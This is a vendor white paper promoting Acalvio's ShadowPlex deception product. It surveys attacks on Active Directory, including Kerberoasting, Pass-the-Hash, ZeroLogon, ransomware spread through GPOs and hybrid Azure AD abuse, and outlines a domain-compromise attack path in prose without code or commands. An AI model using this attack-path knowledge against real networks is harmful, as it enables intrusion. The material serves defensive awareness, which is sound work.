ACTIVE DIRECTORY THREAT LANDSCAPE AND SHADOWPLEX AD

PROTECTION [INTERNAL USE]

Active Directory: The Modern Attack Focal Point

Active Directory (AD) is at the core of the enterprise infrastructure for many organizations and holds valuable, critical
information of user identities, network assets, applications, services, policies, and authentication and authorization data.
However, given the legacy architecture principles that AD was built upon decades ago, completely securing this crown jewel
with today’s diverse technology and infrastructure complexity has been a challenge for most organizations. This challenge
only compounds against the rapid and sophisticated evolution of the threat landscape. While the security posture and
strategy has taken the main stage at most organization today, the solutions mostly involve increasing audit logging, disabling
privileges to run tools, vulnerability scanning, or installing security agents on endpoints and other critical assets. While these
solutions are necessary, they can only provide a limited solution for advanced threat defense against assets such as Active
Directory. In many cases, installing multiple agents can also increase the attack surface and that doesn’t help tighten the
security strategy.

When the first version of Active Directory was released two decades ago, it was built on the philosophy of inherent trust
models within the boundaries of a network. Fast forward 20 years – the ever-expanding enterprise boundaries, the need to
support a mobile workforce, rapid digital transformation, fast-paced cloud adoption, and the IoT and connected Industrial
Control Systems infrastructures have all lead to unprecedented complexity for security management. This means an
explosion in attack surfaces that are well exploited by adversaries using very sophisticated and advanced attack methods.

Security practices and maturity vary significantly across small and medium businesses to large enterprises. The varied
network complexity and enterprise boundary definition pose a different and unique challenge for every organization.
However, what is consistently reported by leading industry threat analysts is that the central identity directory service of
Active Directory deployment is perhaps the most vulnerable aspect of the entire infrastructure. Active Directory has over
95% of the market share among the Fortune 500 organizations. Attacks against AD can have far-reaching consequences for
every organization across multiple industries.

The Active Directory vulnerability vectors are not limited to

software defects, its separation from the network periphery, or
isolation and firewall configurations. Most attacks against Active Most attacks against Active
Directory stem from the way it is configured in any organization. Directory originate from the
Active Directory stores multiple types of objects, each with way it is configured in any
hundreds and thousands of properties for access, authentication, organization. This is not just
authorization, and transactional rules. Protecting the AD and
a security responsibility but
reducing the attack surface comes down to intimately
understanding the object configurations and how these rules can implies rewriting the rules of
be misused by threat actors. This is not just a security how IT management is
responsibility but implies rewriting the rules of how IT carried out in every
management is carried out in every organization. This can perhaps organization.
explain why Active Directory protection is complex, involved, and
takes continuous monitoring and course correction in policy
definitions to minimize the attack surface.

Copyright © 2021 Acalvio Technologies. All Rights Reserved. This document may have been furnished under license for use only within the terms of that license or
NDA. Written and designed at Acalvio Technologies, 2520 Mission College Boulevard, Suite 110, Santa Clara, CA 95054, USA.
2 Active Directory Threat Landscape and ShadowPlex AD Protection

For many enterprises, the current solutions for AD Protection in the market are only as strong as the solution that protects
the endpoints in the enterprise. Unfortunately, of late, it has become rather trivial to target and compromise an enterprise
endpoint using various attack methods such as phishing, spear-phishing, malware, or ransomware infection. When an
endpoint in the enterprise is compromised, attackers perform a local privilege escalation and run a complete reconnaissance
against the enterprise AD and assess the lay of the land. With powerful tools such as Mimikatz, Metasploit, BloodHound,
DeathStar, and Rubeus among many others that are accessible to the attackers, the dwell time for the threat to compromise
the domain controller is significantly minimized. In multiple instances, attackers successfully carry out attacks such as
Kerberoasting and AS-REP Roasting, even without special permissions on the domain to escalate privileges to get to the
domain controller. Even measures such as hardening endpoints and disabling AD Recon can do very little to stop the attack
progression. In certain APT techniques (APT15, also known as K3chang), attackers have been able to run patched copies of
CLI or PowerShell to bypass policies to progress the attack.

As an example, a classic attack path can involve endpoint compromise – using domain credentials to enumerate SPNs –
Kerberoast, AS-REP roasting or Pass-the-Hash attack to obtain service account access – exploit unconstrained delegation to
obtain access to an account for lateral movement – employ stealthy techniques to coerce the Domain Controller to
authenticate the compromised service credential – extract the Domain Controller’s TGT out of memory – impersonate the
Domain Controller account – Complete DC compromise. In most cases, such a compromise comes to light after the damage
has been caused, mainly because the monitoring and defense systems largely rely on authentication and activity log
monitoring.

The type of attacks in the news that weaponize Active Directory to compromise, propagate, or bring down the entire
operational ability reiterates the reach of damage AD compromise can cause. Some of the key attack types that exploit or
use AD as a conduit include:

➢ Advanced Persistent Threats (APTs): It is well established that APTs target Active Directory for the benefits they
can reap with one core compromise. As an example, APT15, also known as K3chang or Playful Dragon, a cyber-
espionage group employs a custom tool called Comma Separated Value Data Exchange (CSVDE) that can export the
entire Active Directory data out. Also, once the AD is compromised, they can get to high-value assets such as MS
SQL Database and export the entire DB data using another tool called Bulk Copy Program (BCP), resulting in a total
compromise of the enterprise data. This attack was carried out against a global company that provides services to
the UK Government in 2018 that led to a widespread leak of military information.

➢ Ransomware Propagation through Active Directory: The modern ransomware campaigns utilize tools like
Mimikatz, BloodHound, and PowerSploit for the AD environment recon, and then to steal credentials, move deeper
into the network, and establish persistence. A rather infamous ransomware strain called LockerGoga routinely taps
into Active Directory to use the AD management service to distribute the ransomware payloads to the thousands of
endpoints managed by the AD. Similarly, another strain of ransomware called SaveTheQueen propagates its
malware payload by modifying the GPO on the SYSVOL share on the Domain Controller. Similarly, Ryuk and Maze
have compromised Active Directory to propagate the infection across the network.

➢ Attacks on Industrial Control Systems: With the increased digitization of Industrial Control Systems, the attacks
against these critical infrastructure systems have also exploded. These enterprises use Active Directory for their IT
segment and even though best practices recommend physical isolation and hard firewall-based segmentation
between the IT and OT networks, there are often instances where these recommendations are violated and Active
Directory installed on the OT network segment. This could be for any number of reasons – from the ease of user
management to ensuring common credentials across IT and production floor systems. Examples suggest that the
AD DC between the IT-OT network segments are configured for automatic synchronization, creating massive attack
and penetration surface. The breach at Norsk Hydro, the world’s largest Aluminum producer, is a clear example of
how the Active Directory was compromised by APT-style Ransomware LockerGoga to distribute the malware
payload across their IT and OT segments. In a similar style, attacks against crucial oil and gas infrastructures
3 Active Directory Threat Landscape and ShadowPlex AD Protection

indicate that the Active Directory compromise was carried out using insecure RDP access and putting in a Trickbot
in the windows logon script.

This arises the question – what constitutes a compelling AD Protection solution?

While many may consider complete AD protection as somewhat of a moving target, it is clear, however, that only traditional
audit-logging and monitoring solutions are insufficient. In addition to solutions that protect the endpoints such as EDR or
EPP, SIEM/SOAR alerting systems, adhering to hardening and least-privilege protocols, and building restoration and
resiliency plans for the AD infrastructure, a good protection solution for AD in any enterprise would be to adopt an Active
Defense strategy. The best AD protection strategy is the one that prevents an attack on the enterprise’s core infrastructure
as much as possible by providing continuous visibility into possible attack surfaces, predicting the attacker’s path, slowing
down, confusing or diverting the attacker, predict and detect the TTP at every stage, and ultimately, even change the
attacker’s perception of the network.

This paper covers some of the most prevalent attack vectors on AD, some of the stealthy attack paths and exploits that most
often evade existing detection systems, and how Acalvio ShadowPlex - an Advanced Deception Platform, can provide a
comprehensive and compelling solution for AD Protection for any enterprise.

Active Directory Administration: Attack Surface and Attack Paths

The security awareness at many organizations has seen a linear growth in
maturity and the security and IT teams may have many best practices and
employee training on the internal security awareness campaigns. These
practices definitely benefit from clearing out easy entry points into the
network and in closing the low-hanging IT administrative attack surfaces. IT
policies that enforce complex passwords, restricted inbound traffic, Even for the most security-
blacklisting PowerShell, CLI and other applications, strict group policies,
forward enterprises,
tightened ACEs and ACLs are the most common things that may be enforced.
While these are much needed and helpful, with the ever-changing nature of balancing the visibility into
the enterprise network, attack surface exposure also changes dynamically the network frailty and
and very frequently. Common business occurrances such as an expanding supporting the business’ IT
network, adding on new geo-locations, remote or branch office networks, needs is a massive challenge
onboarding partners and contractors, supporting R&D labs, M&A integration
activities, introducing new software and applications, cloud adoption and
expansion, linking cloud services to AD - all contribute to a very dynamically
changing attack surface landscape in the enterprise. Even for most security-
forward class of enterprises, balancing the visibility into the network frailty
and supporting the business needs is a massive challenge. In contrast, this
only reemphasizes that organizations that are yet to reach the security
maturity or are still in the process of full digital transformation face a very
steep challenge and are extremely vulnerable to nasty, devastating attacks.

Attack surfaces that may open up exploit paths to compromise the Active
Directory can stem from multiple vectors, but can be broadly summarized
into the following categories as discussed in the following sections.
4 Active Directory Threat Landscape and ShadowPlex AD Protection

Windows System and Active Directory Vulnerabilities

Over the lengthy lifespan of Windows Server and Active Directory, there have been innumerable CVEs scoring from low to
critically high on the CVSS scale. The most recent AD vulnerability (CVE-2020-1472) scored a 10/10 on the CVSS scale. This
vulnerability, called “ZeroLogon Vulnerability” allows an attacker to compromise the entire domain without even requiring
a valid domain credential. This stems from a critical cryptographic protocol flaw that establishes the identity of a domain-
joined system. This vulnerability is so severe that attackers can spoof the identity of any system on the domain, including the
Domain Controller, and simply reset the password and compromise the enterprise within minutes. This is just one latest
vulnerability, and the list of CVEs is by no means short. Microsoft regularly releases security patches and security analysts
are all on top of these vulnerabilities for disclosures, testing, and fix validations. The issue, however, is that for all
enterprises, rolling out patches and ensuring the AD infrastructure is always on the latest and greatest release version is
non-trivial. The time window between the announcement of the vulnerability and patching is the ripe golden opportunity
for attackers. While the defense teams stay on top of plugging these vulnerabilities, the appearance of attack surfaces from
other vectors like misconfigurations leaving holes in the wall may be overlooked. This ties back into missed visibility and lost
time in threat awareness, confirmation, and investigation. When it comes to core infrastructure, patching is necessary, but
more often than not, is simply insufficient.

Active Directory Misconfigurations

One of the most powerful capabilities of Active Directory is its flexible configurability for enforcing varied types of
policies, but unfortunately, this also is one of its biggest security drawbacks. User provisioning, computer/server
management, groups management, ACLs, ACEs, GPOs, attribute populations for multiple object types are all managed
using countless scripts. As a standard practice, the IT teams rely heavily on native methods for administration such as
PowerShell for on-premises and Azure AD deployments. While such administration scripts facilitate extreme flexibility,
it creates a very high level of management complexity in the environment. As the complexity grows, it causes multiple
unknown dependencies and security misconfigurations. Such misconfigurations can create security holes and
unintentionally create unforeseen attack paths.

Unfortunately, what’s worse is that these misconfigurations are hard to find and fix. Each of these can lead to an
undesired exposure and in most cases, they come into light only after a malicious even has occurred because of the
misconfigurations. When it comes to securing the enterprise and a proactive security posture, "learning the hard way”
is too expensive an approach to adopt. The accompanying infographic depicts a few misconfigurations that not only
punch holes in the wall, but leave the door wide open for attackers to simply make their way in.
5 Active Directory Threat Landscape and ShadowPlex AD Protection

Hybrid AD Network Security Challenge

Almost every organization today has a Hybrid IT
network. Cloud adoption has been on a significant
rise and this in turn has resulted in expanded security
boundaries. With the uptake in adoption of Hybrid AD Misconfigurations
Microsoft365®, Azure Active Directory adoption
becomes mandatory. While the Azure platform offers Excessive privileges on cloud resources
a very high degree of security, a lot of the security Custom subscription owner roles
onus still lies with the enterprise, ranging account and Guest access
access management, identity and directory
Disabled storage service encryption
infrastructure, application configurations, network
and OS controls, physical hosts, data centres, Not encrypting Data-in-transit
networks, all the way to data governance, data Long-living Shared Access Signatures
storage and rights management. With varying needs Improper use of Network Security
of an organization, there have been multiple Groups
topologies of the Hybrid Active Directory Source at Microsoft resources
Docs
Unmonitored
deployments.
Unsupervised change orchestration
Some of these are: Synchronized on-prem AD-Azure Password-Writeback Enabled
AD, Cloud-only Azure AD, Embedded AD in Azure, or
Insecure Azure AD Connect server
even Federated on-prem AD-Azure AD. Each of these
models has its own set of attack surfaces that may
become exposed, leading to multiple security blind
spots.

Protecting a hybrid AD environment traditionally is still faced with similar AD security challenges, but on a different
landscape, against blurring lines of control. Deployment choices such as Azure AD Connect, Password hash sync
optional, Azure AD Pass-through Authentication, Azure AD Domain Services - all need heightened vigilance and
extremely close monitoring to keep attack surfaces and unforeseen attack paths under check. In deployments that
use Azure AD Connect, sophisticated attackers may gain access to the AD Connect that synchronizes on-prem AD
with Azure AD and obtain access to user accounts. The Pass-through Authentication can even be exploited to use
what is called as a Skeleton Key to even escalate privileges to Global Admin for the Azure tenant. This can lead to a
land-and-expand attack stemming from on-premises and reaching Azure, spelling a devastating breach.

The Democratization of Red Team Tools

Over the last few years, the cybersecurity community has made tremendous advancements in authoring Red Team tools and
making them available as open-source. While this has lent tremendous benefits for the defense teams, the attackers have
adopted the usage of these powerful tools as well. BloodHound, PowerSploit, MetaSploit, Mimikatz, Hashcat, Rubeus,
ADRecon, Kekeo, DeathStar, PowerView, and many others are openly available for anyone and everyone. BloodHound, for
instance, can find the shortest path within the network for privilege escalation and lateral movement. This extremely
powerful tool can very easily discover relationships between various entities in the domain and calculate the shortest attack
path and traversal using the object links. While the defense teams at some organizations effectively use these for their Red-
Blue team activities, many organizations may not have either reached the level of security maturity or may not conduct
these activities as frequently to find the security gaps and proactively fix them.

Contrasting this with attackers’ fast-paced adoption of these powerful tools, they always seem to be ahead in the game. In
addition to these open source tools, attackers often use Living-off-the-Land (LotL) techniques to fully utilize powerful tools
such as Windows PowerShell already available in the environment. This assists them in evading detection easily, even in
environments that have alerting mechanisms set up against the use of such powerful tools on endpoints. A simple renaming
6 Active Directory Threat Landscape and ShadowPlex AD Protection

of a PowerShell script or modifying the offensive code to a certain degree can throw the detection system off-balance. Also,
in the absence of automated responses for such events, manual investigation, triaging and response lifecycle simply loses
the time criticality battle.

The illustration below shows a sample attack path concept using open source and in-built tools that can lead to a complete
domain compromise.

Digitization of ICS Environments

Industry 4.0 and Industrial Internet of Things (IIoT) or any other terminology such as Digital Twins all indicate one common
thing – the complete digital transformation of the Industrial sector. With this transformation, there is hyper-connectivity to
the Operational Technology (OT) segments of the industry. This in turn implies that more and more people are granted
remote access to systems that were previously air-gapped, isolated, and managed from dedicated HMI and HIST terminals.
Many industries still use management devices and equipment that may be based on legacy technologies and are far away
from modern secure computing systems. The transformational management solutions now fuse multiple such
interconnected brittle systems and enable process monitoring and maintenance from remote locations.

In general, ICS architectures are based on the 5-Level Purdue Model that layers the Enterprise IT layers and Production or
Manufacturing Zone and Security Zones. However, recently, the ICS enterprises have seen attackers pivoting from the IT to
the OT segments by compromising IT endpoints, using the same attack paths as in any IT network, escalating privileges,
moving laterally until they find vulnerable ICS interfaces such as remote terminals and HMI systems. Along the way,
multiple documented attacks have compromised the Active Directory to enumerate control systems of the OT devices.
Some prominent examples are Black Energy (attacking HMIs), Shamoon (attack against Saudi Arabia’s civil aviation sector),
APT33 (cyber espionage targeting aviation), NotPetya (Ukraine Power Grid), Dragonfly (attacking the energy sector) among
many others. In summary, digitization of the ICS sector has created a wider attack surface for the enterprises and
cybersecurity posture must include detection, monitoring, and proactive protection of the ICS segment.
 7 Active Directory Threat Landscape and ShadowPlex AD Protection

Current Defense and Detection Systems

Most detection and security systems today are based on agent-based behavioral detection, AD event log monitoring, SIEM-
based event correlation, SOC triaging, and manual investigation and aftermath threat hunting. While these methods do offer
a certain degree of defense capabilities, when it comes to securing critical infrastructure components like Active Directory
needs a more compelling Active Defense strategy. The MITRE Shield is an active defense knowledgebase that encourages
the use of limited offensive action and counterattacks to deny attack progress. The Shield Matrix lists multiple tactics
spanning channel, collect, contain, detect, disrupt, facilitate, legitimize, and test. Using Deception techniques across all of
these tactics for detection, engagement and counterattack takes the center stage in the matrix. This is a compelling
framework to build a stronger, proactive AD defense strategy.

Certain deception solutions in the market offer AD protection using non-scalable solutions such as creating complete fake
AD forests, hiding real production assets and domain controllers on parts of the network segment, intercepting DNS lookups,
or deploying a large number of deceptions on enterprise endpoints’ memory. Such solutions cannot offer holistic AD
protection covering multiple bases and are largely static and cannot cover a complex and diverse enterprise network that
comprises a variety of OSes, Azure, or Hybrid AD models.

Acalvio Solution for Active Directory Protection

Acalvio’s ShadowPlex is an autonomous
deception platform that provides AI-based
deception solution for Active Directory
protection. ShadowPlex’s strong capabilities
include deep visibility of the network assets
and AD misconfigurations using automatic AD
discovery. Advanced AI algorithms provide
situational awareness of possible threat
vectors lurking on the network and their
distance from the critical assets, along with
possible attack paths. ShadowPlex combines
threat intelligence from various sources using
pre-built integrations and builds an attacker’s
view of the network that can be invaluable for
the defense teams to proactive reduce the ShadowPlex supports on-premises AD deployments, Azure AD and
attack surface. Hybrid AD deployments and provides pre-packaged deception playbook
for AD protection. ShadowPlex’s playbooks incorporate deep knowledge
of the threat landscape and TTPs used by sophisticated threats. A rich
palette of deceptions enables casting a wider net with automatic key
deception placements on the network. ShadowPlex is the only
deception solution in the market that offers a wide array of capabilities
for Threat Hunting and Investigation based on Advanced Analytics.

Contact Acalvio
Get in touch with Acalvio to schedule a demo of ShadowPlex, or to Try-and-Buy the Deception-based Active Directory
Protection.

About Acalvio:

Acalvio is an inventor of industry-leading advancements in Deception Technology for Advanced Threat Protection. With over 25 issued patents, Acalvio has integrated
Deception technology with advanced AI to provide an autonomous deception solution that is effective, easy to use and can be deployed at enterprise-scale with minimal
overhead. Acalvio ShadowPlex reduces attacker dwell time by early detection of advanced threats and increases SOC efficiency through sophisticated investigation and active
threat-hunting capabilities. Extensive partner integrations allow ShadowPlex to leverage the customer’s ecosystem for rapid and comprehensive threat containment.

Acalvio Technologies| 2520 Mission College Boulevard, Suite 110, Santa Clara, CA 95054, USA | www.acalvio.com